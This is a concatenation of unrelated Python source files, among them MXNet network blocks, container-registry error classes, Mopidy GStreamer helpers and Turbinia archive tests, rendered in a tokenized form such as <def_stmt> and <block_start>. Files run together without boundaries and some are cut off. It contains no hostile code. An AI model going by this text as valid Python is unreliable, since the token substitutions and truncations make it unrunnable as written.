name=name+'_sc_bn')<block_end><block_end><if_stmt>memonger<block_start>shortcut._set_attr(mirror_stage='True')<block_end><return>conv4+shortcut<line_sep>#return bn4 + shortcut #return act4 + shortcut <block_end><def_stmt>block17 net input_num_channels scale=1.0 with_act=<true> act_type='relu' mirror_attr={} name=''<block_start>tower_conv=ConvFactory(net 192 (1 1) name=name+'_conv')<line_sep>tower_conv1_0=ConvFactory(net 129 (1 1) name=name+'_conv1_0')<line_sep>tower_conv1_1=ConvFactory(tower_conv1_0 160 (1 7) pad=(1 2) name=name+'_conv1_1')<line_sep>tower_conv1_2=ConvFactory(tower_conv1_1 192 (7 1) pad=(2 1) name=name+'_conv1_2')<line_sep>tower_mixed=mx.symbol.Concat(*[tower_conv tower_conv1_2])<line_sep>tower_out=ConvFactory(tower_mixed input_num_channels (1 1) with_act=<false> name=name+'_conv_out')<line_sep>net=net+scale<times>tower_out<if_stmt>with_act<block_start>act=mx.symbol.Activation(data=net act_type=act_type attr=mirror_attr)<line_sep><return>act<block_end><else_stmt><block_start><return>net<block_end><block_end><def_stmt>block35 net input_num_channels scale=1.0 with_act=<true> act_type='relu' mirror_attr={} name=''<block_start>M=1.0<line_sep>tower_conv=ConvFactory(net int(input_num_channels<times>0.25<times>M) (1 1) 
name=name+'_conv')<line_sep>tower_conv1_0=ConvFactory(net int(input_num_channels<times>0.25<times>M) (1 1) name=name+'_conv1_0')<line_sep>tower_conv1_1=ConvFactory(tower_conv1_0 int(input_num_channels<times>0.25<times>M) (3 3) pad=(1 1) name=name+'_conv1_1')<line_sep>tower_conv2_0=ConvFactory(net int(input_num_channels<times>0.25<times>M) (1 1) name=name+'_conv2_0')<line_sep>tower_conv2_1=ConvFactory(tower_conv2_0 int(input_num_channels<times>0.375<times>M) (3 3) pad=(1 1) name=name+'_conv2_1')<line_sep>tower_conv2_2=ConvFactory(tower_conv2_1 int(input_num_channels<times>0.5<times>M) (3 3) pad=(1 1) name=name+'_conv2_2')<line_sep>tower_mixed=mx.symbol.Concat(*[tower_conv tower_conv1_1 tower_conv2_2])<line_sep>tower_out=ConvFactory(tower_mixed input_num_channels (1 1) with_act=<false> name=name+'_conv_out')<line_sep>net=net+scale<times>tower_out<if_stmt>with_act<block_start>act=mx.symbol.Activation(data=net act_type=act_type attr=mirror_attr)<line_sep><return>act<block_end><else_stmt><block_start><return>net<block_end><block_end><def_stmt>conv_inception data num_filter stride dim_match name binarize dcn dilate **kwargs<block_start><assert_stmt><not>binarize<if_stmt>stride[0]<g>1<or><not>dim_match<block_start><return>conv_resnet(data num_filter stride dim_match name binarize dcn dilate **kwargs)<block_end>conv4=block35(data num_filter name=name+'_block35')<line_sep><return>conv4<block_end><def_stmt>conv_cab data num_filter stride dim_match name binarize dcn dilate **kwargs<block_start>workspace=config.workspace<if_stmt>stride[0]<g>1<or><not>dim_match<block_start><return>conv_hpm(data num_filter stride dim_match name binarize dcn dilate **kwargs)<block_end>cab=CAB(data num_filter 1 4 workspace name dilate 1)<line_sep><return>cab.get()<block_end><def_stmt>conv_block data num_filter stride dim_match name binarize dcn dilate<block_start><if_stmt>config.net_block<eq>'resnet'<block_start><return>conv_resnet(data num_filter stride dim_match name binarize dcn dilate)<block_end><elif_stmt>config.net_block<eq>'inception'<block_start><return>conv_inception(data num_filter stride dim_match name binarize dcn dilate)<block_end><elif_stmt>config.net_block<eq>'hpm'<block_start><return>conv_hpm(data num_filter stride dim_match name binarize dcn dilate)<block_end><elif_stmt>config.net_block<eq>'cab'<block_start><return>conv_cab(data num_filter stride dim_match name binarize dcn dilate)<block_end><block_end>#def lin(data, num_filter, workspace, name, binarize, dcn): # bit = 1 # ACT_BIT = config.ACT_BIT # bn_mom = config.bn_mom # workspace = config.workspace # if not binarize: # if not dcn: # conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), # no_bias=True, workspace=workspace, name=name + '_conv') # bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # return act1 # else: # bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1, # num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1)) # conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset, # num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False) # #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1), # 
# no_bias=False, workspace=workspace, name=name + '_conv') # return conv1 # else: # bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), # no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit) # conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2') # return conv1 <def_stmt>lin3 data num_filter workspace name k g=1 d=1<block_start>bn_mom=config.bn_mom<line_sep>workspace=config.workspace<if_stmt>k<ne>3<block_start>conv1=Conv(data=data num_filter=num_filter kernel=(k k) stride=(1 1) pad=((k-1)<floordiv>2 (k-1)<floordiv>2) num_group=g no_bias=<true> workspace=workspace name=name+'_conv')<block_end><else_stmt><block_start>conv1=Conv(data=data num_filter=num_filter kernel=(k k) stride=(1 1) pad=(d d) num_group=g dilate=(d d) no_bias=<true> workspace=workspace name=name+'_conv')<block_end>bn1=mx.sym.BatchNorm(data=conv1 fix_gamma=<false> momentum=bn_mom eps=2e-5 name=name+'_bn')<line_sep>act1=Act(data=bn1 act_type='relu' name=name+'_relu')<line_sep>ret=act1<line_sep><return>ret<block_end><class_stmt>CAB<block_start><def_stmt>__init__ self data nFilters nModules n workspace name dilate group<block_start>self.data=data<line_sep>self.nFilters=nFilters<line_sep>self.nModules=nModules<line_sep>self.n=n<line_sep>self.workspace=workspace<line_sep>self.name=name<line_sep>self.dilate=dilate<line_sep>self.group=group<line_sep>self.sym_map={}<block_end><def_stmt>get_output self w h<block_start>key=(w h)<if_stmt>key<in>self.sym_map<block_start><return>self.sym_map[key]<block_end>ret=<none><if_stmt>h<eq>self.n<block_start><if_stmt>w<eq>self.n<block_start>ret=(self.data self.nFilters)<block_end><else_stmt><block_start>x=self.get_output(w+1 h)<line_sep>f=int(x[1]<times>0.5)<if_stmt>w<ne>self.n-1<block_start>body=lin3(x[0] f self.workspace "%s_w%d_h%d_1"%(self.name w h) 3 self.group 1)<block_end><else_stmt><block_start>body=lin3(x[0] f self.workspace "%s_w%d_h%d_1"%(self.name w h) 3 self.group self.dilate)<block_end>ret=(body f)<block_end><block_end><else_stmt><block_start>x=self.get_output(w+1 h+1)<line_sep>y=self.get_output(w h+1)<if_stmt>h%2<eq>1<and>h<ne>w<block_start>xbody=lin3(x[0] x[1] self.workspace "%s_w%d_h%d_2"%(self.name w h) 3 x[1])<line_sep>#xbody = xbody+x[0] <block_end><else_stmt><block_start>xbody=x[0]<block_end>#xbody = x[0] #xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1]) <if_stmt>w<eq>0<block_start>ybody=lin3(y[0] y[1] self.workspace "%s_w%d_h%d_3"%(self.name w h) 3 self.group)<block_end><else_stmt><block_start>ybody=y[0]<block_end>ybody=mx.sym.concat(y[0] ybody dim=1)<line_sep>body=mx.sym.add_n(xbody ybody name="%s_w%d_h%d_add"%(self.name w h))<line_sep>body=body/2<line_sep>ret=(body x[1])<block_end>self.sym_map[key]=ret<line_sep><return>ret<block_end><def_stmt>get self<block_start><return>self.get_output(1 1)[0]<block_end><block_end>
<import_stmt>functools<class_stmt>MyBaseException(Exception)<block_start><pass><block_end><class_stmt>SomeException(MyBaseException)<block_start><pass><block_end><class_stmt>TestClass1(object)<block_start>cls_object=25<def_stmt>__init__ self value<block_start>self._value=value<line_sep>self._value2=123<block_end><def_stmt>unsupported_method self<block_start><pass><block_end><def_stmt>print_value self<block_start><return>self._value<block_end><def_stmt>__str__ self<block_start><return>"My str representation is %s"%str(self._value)<block_end><def_stmt>__repr__ self<block_start><return>"My repr representation is %s"%str(self._value)<block_end>@property<def_stmt>value self<block_start><return>self._value<block_end>@value.setter<def_stmt>value self value<block_start>self._value=value<block_end><def_stmt>to_class2 self count stride=1<block_start><return>TestClass2(self._value stride count)<block_end>@staticmethod<def_stmt>somethingstatic val<block_start><return>val+42<block_end>@classmethod<def_stmt>somethingclass cls<block_start><return>cls.cls_object<block_end>@property<def_stmt>override_value self<block_start><return>self._value2<block_end>@override_value.setter<def_stmt>override_value self value<block_start>self._value2=value<block_end><block_end><class_stmt>TestClass2(object)<block_start><def_stmt>__init__ self value stride count<block_start>self._mylist=[value+stride<times>i<for>i range(count)]<block_end><def_stmt>something self val<block_start><return>"In Test2 with %s"%val<block_end><def_stmt>__iter__ self<block_start>self._pos=0<line_sep><return>self<block_end><def_stmt>__next__ self<block_start><if_stmt>self._pos<l>len(self._mylist)<block_start>self._pos<augadd>1<line_sep><return>self._mylist[self._pos-1]<block_end><raise>StopIteration<block_end><block_end><class_stmt>TestClass3(object)<block_start><def_stmt>__init__ self<block_start>print("I am Class3")<block_end><def_stmt>thirdfunction self val<block_start>print("Got value: %s"%val)<line_sep># raise AttributeError("Some weird error") <block_end><def_stmt>raiseSomething self<block_start><raise>SomeException("Something went wrong")<block_end><def_stmt>__hidden self name value<block_start>setattr(self name value)<block_end><def_stmt>weird_indirection self name<block_start><return>functools.partial(self.__hidden name)<block_end><block_end><def_stmt>test_func *args **kwargs<block_start><return>"In test func"<block_end>test_value=1<line_sep>
<import_from_stmt>.expert UpstreamExpert<as>_UpstreamExpert<def_stmt>customized_upstream *args **kwargs<block_start>""" To enable your customized pretrained model, you only need to implement upstream/example/expert.py and leave this file as is. This file is used to register the UpstreamExpert in upstream/example/expert.py The following is a brief introduction of the registration mechanism. The s3prl/hub.py will collect all the entries registered in this file (callable variables without the underscore prefix) as a centralized upstream factory. One can pick up this upstream from the factory via 1. from s3prl.hub import customized_upstream model = customized_upstream(ckpt, model_config) 2. model = torch.hub.load( 'your_s3prl_path', 'customized_upstream', ckpt, model_config, source='local', ) Our run_downstream.py and downstream/runner.py follows the first usage """<line_sep><return>_UpstreamExpert(*args **kwargs)<block_end>
# -*- coding: utf-8 -*- # ================================================================= # # Authors: <NAME> <<EMAIL>> # <NAME> <<EMAIL>> # # Copyright (c) 2015 <NAME> # Copyright (c) 2015 <NAME> # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following # conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # ================================================================= <import_stmt>os<import_stmt>warnings<class_stmt>Profile(object)<block_start>''' base Profile class '''<def_stmt>__init__ self name version title url namespace typename outputschema prefixes model core_namespaces added_namespaces repository<block_start>''' Initialize profile '''<line_sep>self.name=name<line_sep>self.version=version<line_sep>self.title=title<line_sep>self.url=url<line_sep>self.namespace=namespace<line_sep>self.typename=typename<line_sep>self.outputschema=outputschema<line_sep>self.prefixes=prefixes<line_sep>self.repository=repository<if_stmt>'DescribeRecord'<in>model['operations']<block_start>model['operations']['DescribeRecord']['parameters']['typeName']['values'].append(self.typename)<block_end>model['operations']['GetRecords']['parameters']['outputSchema']['values'].append(self.outputschema)<line_sep>model['operations']['GetRecords']['parameters']['typeNames']['values'].append(self.typename)<line_sep>model['operations']['GetRecordById']['parameters']['outputSchema']['values'].append(self.outputschema)<if_stmt>'Harvest'<in>model['operations']<block_start>model['operations']['Harvest']['parameters']['ResourceType']['values'].append(self.outputschema)<block_end># namespaces core_namespaces.update(added_namespaces)<line_sep># repository model['typenames'][self.typename]=self.repository<block_end><def_stmt>extend_core self model namespaces config<block_start>''' Extend config.model and config.namespaces '''<line_sep><raise>NotImplementedError<block_end><def_stmt>check_parameters self<block_start>''' Perform extra parameters checking. 
Return dict with keys "locator", "code", "text" or None '''<line_sep><raise>NotImplementedError<block_end><def_stmt>get_extendedcapabilities self<block_start>''' Return ExtendedCapabilities child as lxml.etree.Element '''<line_sep><raise>NotImplementedError<block_end><def_stmt>get_schemacomponents self<block_start>''' Return schema components as lxml.etree.Element list '''<line_sep><raise>NotImplementedError<block_end><def_stmt>check_getdomain self kvp<block_start>'''Perform extra profile specific checks in the GetDomain request'''<line_sep><raise>NotImplementedError<block_end><def_stmt>write_record self result esn outputschema queryables<block_start>''' Return csw:SearchResults child as lxml.etree.Element '''<line_sep><raise>NotImplementedError<block_end><def_stmt>transform2dcmappings self queryables<block_start>''' Transform information model mappings into csw:Record mappings '''<line_sep><raise>NotImplementedError<block_end><block_end><def_stmt>load_profiles path cls profiles<block_start>''' load CSW profiles, return dict by class name '''<def_stmt>look_for_subclass modulename<block_start>module=__import__(modulename)<line_sep>dmod=module.__dict__<for_stmt>modname modulename.split('.')[1:]<block_start>dmod=dmod[modname].__dict__<block_end><for_stmt>key,entry dmod.items()<block_start><if_stmt>key<eq>cls.__name__<block_start><continue><block_end><try_stmt><block_start><if_stmt>issubclass(entry cls)<block_start>aps['plugins'][key]=entry<block_end><block_end><except_stmt>TypeError<block_start><continue><block_end><block_end><block_end>aps={}<line_sep>aps['plugins']={}<line_sep>aps['loaded']={}<for_stmt>prof profiles.split(',')# fgdc, atom, dif, gm03 are supported in core # no need to specify them explicitly anymore # provide deprecation warning # https://github.com/geopython/pycsw/issues/118 <block_start><if_stmt>prof<in>['fgdc' 'atom' 'dif' 'gm03']<block_start>warnings.warn('%s is now a core module, and does not need to be'<concat>' specified explicitly. So you can remove %s from '<concat>'server.profiles'%(prof prof))<block_end><else_stmt><block_start>modulename='%s.%s.%s'%(path.replace(os.sep '.') prof prof)<line_sep>look_for_subclass(modulename)<block_end><block_end><return>aps<block_end>
<import_from_stmt>.pspace PMatDense PMatBlockDiag PMatDiag PMatLowRank PMatImplicit PMatKFAC PMatEKFAC PMatQuasiDiag <import_from_stmt>.vector PVector FVector <import_from_stmt>.fspace FMatDense <import_from_stmt>.map PushForwardDense PushForwardImplicit PullBackDense <line_sep>
<import_stmt>bitmath<class_stmt>V2RegistryException(Exception)<block_start><def_stmt>__init__ self error_code_str message detail http_status_code=400 repository=<none> scopes=<none> is_read_only=<false> <block_start>super(V2RegistryException self).__init__(message)<line_sep>self.http_status_code=http_status_code<line_sep>self.repository=repository<line_sep>self.scopes=scopes<line_sep>self.is_read_only=is_read_only<line_sep>self._error_code_str=error_code_str<line_sep>self._detail=detail<block_end><def_stmt>as_dict self<block_start>error_dict={"code":self._error_code_str "message":str(self) "detail":self._detail<if>self._detail<is><not><none><else>{} }<if_stmt>self.is_read_only<block_start>error_dict["is_readonly"]=<true><block_end><return>error_dict<block_end><block_end><class_stmt>BlobUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(BlobUnknown self).__init__("BLOB_UNKNOWN" "blob unknown to registry" detail 404)<block_end><block_end><class_stmt>BlobUploadInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(BlobUploadInvalid self).__init__("BLOB_UPLOAD_INVALID" "blob upload invalid" detail)<block_end><block_end><class_stmt>BlobUploadUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(BlobUploadUnknown self).__init__("BLOB_UPLOAD_UNKNOWN" "blob upload unknown to registry" detail 404)<block_end><block_end><class_stmt>DigestInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(DigestInvalid self).__init__("DIGEST_INVALID" "provided digest did not match uploaded content" detail)<block_end><block_end><class_stmt>ManifestBlobUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(ManifestBlobUnknown self).__init__("MANIFEST_BLOB_UNKNOWN" "manifest blob unknown to registry" detail)<block_end><block_end><class_stmt>ManifestInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none> http_status_code=400<block_start>super(ManifestInvalid self).__init__("MANIFEST_INVALID" "manifest invalid" detail http_status_code)<block_end><block_end><class_stmt>ManifestUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(ManifestUnknown self).__init__("MANIFEST_UNKNOWN" "manifest unknown" detail 404)<block_end><block_end><class_stmt>TagExpired(V2RegistryException)<block_start><def_stmt>__init__ self message=<none> detail=<none><block_start>super(TagExpired self).__init__("TAG_EXPIRED" message<or>"Tag has expired" detail 404)<block_end><block_end><class_stmt>ManifestUnverified(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(ManifestUnverified self).__init__("MANIFEST_UNVERIFIED" "manifest failed signature verification" detail)<block_end><block_end><class_stmt>NameInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none> message=<none><block_start>super(NameInvalid self).__init__("NAME_INVALID" message<or>"invalid repository name" detail)<block_end><block_end><class_stmt>NameUnknown(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(NameUnknown self).__init__("NAME_UNKNOWN" "repository name not known to registry" detail 404)<block_end><block_end><class_stmt>SizeInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(SizeInvalid self).__init__("SIZE_INVALID" "provided length did not match content 
length" detail)<block_end><block_end><class_stmt>TagAlreadyExists(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(TagAlreadyExists self).__init__("TAG_ALREADY_EXISTS" "tag was already pushed" detail 409)<block_end><block_end><class_stmt>TagInvalid(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>super(TagInvalid self).__init__("TAG_INVALID" "manifest tag did not match URI" detail)<block_end><block_end><class_stmt>LayerTooLarge(V2RegistryException)<block_start><def_stmt>__init__ self uploaded=<none> max_allowed=<none><block_start>detail={}<line_sep>message="Uploaded blob is larger than allowed by this registry"<if_stmt>uploaded<is><not><none><and>max_allowed<is><not><none><block_start>detail={"reason":"%s is greater than maximum allowed size %s"%(uploaded max_allowed) "max_allowed":max_allowed "uploaded":uploaded }<line_sep>up_str=bitmath.Byte(uploaded).best_prefix().format("{value:.2f} {unit}")<line_sep>max_str=bitmath.Byte(max_allowed).best_prefix().format("{value:.2f} {unit}")<line_sep>message="Uploaded blob of %s is larger than %s allowed by this registry"%(up_str max_str )<block_end><block_end><block_end><class_stmt>Unauthorized(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none> repository=<none> scopes=<none><block_start>super(Unauthorized self).__init__("UNAUTHORIZED" "access to the requested resource is not authorized" detail 401 repository=repository scopes=scopes )<block_end><block_end><class_stmt>Unsupported(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none> message=<none><block_start>super(Unsupported self).__init__("UNSUPPORTED" message<or>"The operation is unsupported." detail 405)<block_end><block_end><class_stmt>InvalidLogin(V2RegistryException)<block_start><def_stmt>__init__ self message=<none><block_start>super(InvalidLogin self).__init__("UNAUTHORIZED" message<or>"Specified credentials are invalid" {} 401)<block_end><block_end><class_stmt>InvalidRequest(V2RegistryException)<block_start><def_stmt>__init__ self message=<none><block_start>super(InvalidRequest self).__init__("INVALID_REQUEST" message<or>"Invalid request" {} 400)<block_end><block_end><class_stmt>NamespaceDisabled(V2RegistryException)<block_start><def_stmt>__init__ self message=<none><block_start>message=message<or>"This namespace is disabled. Please contact your system administrator."<line_sep>super(NamespaceDisabled self).__init__("DENIED" message {} 405)<block_end><block_end><class_stmt>BlobDownloadGeoBlocked(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>message=("The region from which you are pulling has been geo-ip blocked. "+"Please contact the namespace owner.")<line_sep>super(BlobDownloadGeoBlocked self).__init__("DENIED" message detail 403)<block_end><block_end><class_stmt>ReadOnlyMode(V2RegistryException)<block_start><def_stmt>__init__ self detail=<none><block_start>message=("System is currently read-only. Pulls will succeed but all write operations "+"are currently suspended.")<line_sep>super(ReadOnlyMode self).__init__("DENIED" message detail 405 is_read_only=<true>)<block_end><block_end>
#! /usr/bin/env python # -*- coding: utf-8 -*- # # author: <NAME> # contact: <EMAIL> # MIT License # Copyright (c) 2020 <NAME> # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. <import_stmt>os<import_stmt>tempfile<import_from_stmt>time time<import_stmt>datetime<import_stmt>numpy<as>np<import_stmt>nibabel<as>nib<class_stmt>nib_loader(object)<block_start>""" """<def_stmt>__init__ self<block_start><pass><block_end><def_stmt>load_vol self path<block_start>""" path : patient data path returns numpy array of patient data """<line_sep>self.patient=nib.load(path)<line_sep>self.affine=self.patient.affine<line_sep><return>self.patient.get_data()<block_end><def_stmt>write_vol self path volume<block_start>""" path : path to write the data vol : modifient volume return: True or False based on saving of volume """<try_stmt><block_start>volume=np.uint8(volume)<line_sep>volume=nib.Nifti1Image(volume self.affine)<line_sep>volume.set_data_dtype(np.uint8)<line_sep>nib.save(volume path)<line_sep><return><true><block_end><except_stmt><block_start><return><false><block_end><block_end><block_end>
# terrascript/resource/ddelnano/mikrotik.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:21:43 UTC) <import_stmt>terrascript<class_stmt>mikrotik_bgp_instance(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_bgp_peer(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_dhcp_lease(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_dns_record(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_pool(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_scheduler(terrascript.Resource)<block_start><pass><block_end><class_stmt>mikrotik_script(terrascript.Resource)<block_start><pass><block_end>__all__=["mikrotik_bgp_instance" "mikrotik_bgp_peer" "mikrotik_dhcp_lease" "mikrotik_dns_record" "mikrotik_pool" "mikrotik_scheduler" "mikrotik_script" ]<line_sep>
# Runtime: 68 ms # Memory usage: 16.6 MB # Approach: insert a sentinel node before the head node # Definition for singly-linked list. # class ListNode: # def __init__(self, x): # self.val = x # self.next = None <class_stmt>Solution<block_start><def_stmt>removeElements self head:ListNode val:int<arrow>ListNode# sentinel node, inserted before the head node <block_start>sentinel=ListNode(0)<line_sep>sentinel.next=head<line_sep># initialize two pointers, curr and prev prev,curr=sentinel head<while_stmt>curr<block_start><if_stmt>curr.val<eq>val<block_start>prev.next=curr.next<block_end><else_stmt><block_start>prev=curr<block_end># move to the next element curr=curr.next<block_end><return>sentinel.next<block_end><block_end>
<import_from_stmt>mopidy httpclient<import_from_stmt>mopidy.internal.gi Gst<def_stmt>calculate_duration num_samples sample_rate<block_start>"""Determine duration of samples using GStreamer helper for precise math."""<line_sep><return>Gst.util_uint64_scale(num_samples Gst.SECOND sample_rate)<block_end><def_stmt>create_buffer data timestamp=<none> duration=<none><block_start>"""Create a new GStreamer buffer based on provided data. Mainly intended to keep gst imports out of non-audio modules. .. versionchanged:: 2.0 ``capabilites`` argument was removed. """<if_stmt><not>data<block_start><raise>ValueError("Cannot create buffer without data")<block_end>buffer_=Gst.Buffer.new_wrapped(data)<if_stmt>timestamp<is><not><none><block_start>buffer_.pts=timestamp<block_end><if_stmt>duration<is><not><none><block_start>buffer_.duration=duration<block_end><return>buffer_<block_end><def_stmt>millisecond_to_clocktime value<block_start>"""Convert a millisecond time to internal GStreamer time."""<line_sep><return>value<times>Gst.MSECOND<block_end><def_stmt>clocktime_to_millisecond value<block_start>"""Convert an internal GStreamer time to millisecond time."""<line_sep><return>value<floordiv>Gst.MSECOND<block_end><def_stmt>supported_uri_schemes uri_schemes<block_start>"""Determine which URIs we can actually support from provided whitelist. :param uri_schemes: list/set of URIs to check support for. :type uri_schemes: list or set or URI schemes as strings. :rtype: set of URI schemes we can support via this GStreamer install. """<line_sep>supported_schemes=set()<line_sep>registry=Gst.Registry.get()<for_stmt>factory registry.get_feature_list(Gst.ElementFactory)<block_start><for_stmt>uri factory.get_uri_protocols()<block_start><if_stmt>uri<in>uri_schemes<block_start>supported_schemes.add(uri)<block_end><block_end><block_end><return>supported_schemes<block_end><def_stmt>setup_proxy element config<block_start>"""Configure a GStreamer element with proxy settings. :param element: element to setup proxy in. :type element: :class:`Gst.GstElement` :param config: proxy settings to use. :type config: :class:`dict` """<if_stmt><not>hasattr(element.props "proxy")<or><not>config.get("hostname")<block_start><return><block_end>element.set_property("proxy" httpclient.format_proxy(config auth=<false>))<line_sep>element.set_property("proxy-id" config.get("username"))<line_sep>element.set_property("proxy-pw" config.get("password"))<block_end><class_stmt>Signals<block_start>"""Helper for tracking gobject signal registrations"""<def_stmt>__init__ self<block_start>self._ids={}<block_end><def_stmt>connect self element event func *args<block_start>"""Connect a function + args to signal event on an element. Each event may only be handled by one callback in this implementation. """<if_stmt>(element event)<in>self._ids<block_start><raise>AssertionError<block_end>self._ids[(element event)]=element.connect(event func *args)<block_end><def_stmt>disconnect self element event<block_start>"""Disconnect whatever handler we have for an element+event pair. Does nothing it the handler has already been removed. """<line_sep>signal_id=self._ids.pop((element event) <none>)<if_stmt>signal_id<is><not><none><block_start>element.disconnect(signal_id)<block_end><block_end><def_stmt>clear self<block_start>"""Clear all registered signal handlers."""<for_stmt>element,event list(self._ids)<block_start>element.disconnect(self._ids.pop((element event)))<block_end><block_end><block_end>
# -*- coding: utf-8 -*- # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for the Archive processor to compress and decompress folders."""<import_from_future_stmt> unicode_literals<import_stmt>os<import_stmt>tarfile<import_stmt>unittest<import_stmt>tempfile<import_from_stmt>random randint<import_from_stmt>shutil rmtree<import_from_stmt>turbinia.processors archive<import_from_stmt>turbinia TurbiniaException<class_stmt>ArchiveProcessorTest(unittest.TestCase)<block_start>"""Tests for Archive Processor."""<def_stmt>setUp self# Setup testing directories/variables. <block_start>self.test_files=[]<line_sep>self.base_output_dir=tempfile.mkdtemp(prefix='turbinia-test-local')<line_sep>self.tmp_files_dir=os.path.join(self.base_output_dir 'files')<line_sep>self.tmp_archive=os.path.join(self.base_output_dir 'files.tar.gz')<if_stmt><not>os.path.exists(self.tmp_files_dir)<block_start>os.makedirs(self.tmp_files_dir)<block_end># Generate text files containing random numbers. file_max=10<line_sep>counter=0<while_stmt>counter<le>file_max<block_start>file_name='file{0:s}.txt'.format(str(counter))<line_sep>file_path=os.path.join(self.tmp_files_dir file_name)<line_sep>file_open=open(file_path 'w+')<line_sep>rand_nums=[randint(0 1000)<for>i range(50)]<for_stmt>i rand_nums<block_start>file_open.write('%s\n'%str(i))<block_end>file_open.close()<line_sep>counter<augadd>1<line_sep>self.test_files.append(file_name)<block_end>archive.CompressDirectory(self.tmp_files_dir)<block_end><def_stmt>tearDown self# Remove testing directory for this unit test. <block_start><if_stmt>os.path.exists(self.base_output_dir)<block_start>rmtree(self.base_output_dir)<block_end><block_end><def_stmt>test_compressed_dir self<block_start>"""Tests the compression function"""<line_sep># Check if compressed directory matches expected output path. self.assertEqual(archive.CompressDirectory(self.tmp_files_dir) self.tmp_archive)<line_sep># Check to confirm that the archive is gzip format. self.assertEqual(tarfile.is_tarfile(self.tmp_archive) <true>)<line_sep># Raise assertion if folder does not exist. <with_stmt>self.assertRaises(TurbiniaException)<block_start>archive.CompressDirectory('blah')<block_end><block_end><def_stmt>test_validate_tarfile self<block_start>"""Tests the validate function used to decompress tar files"""<line_sep># Raise exception for file that does not exist. 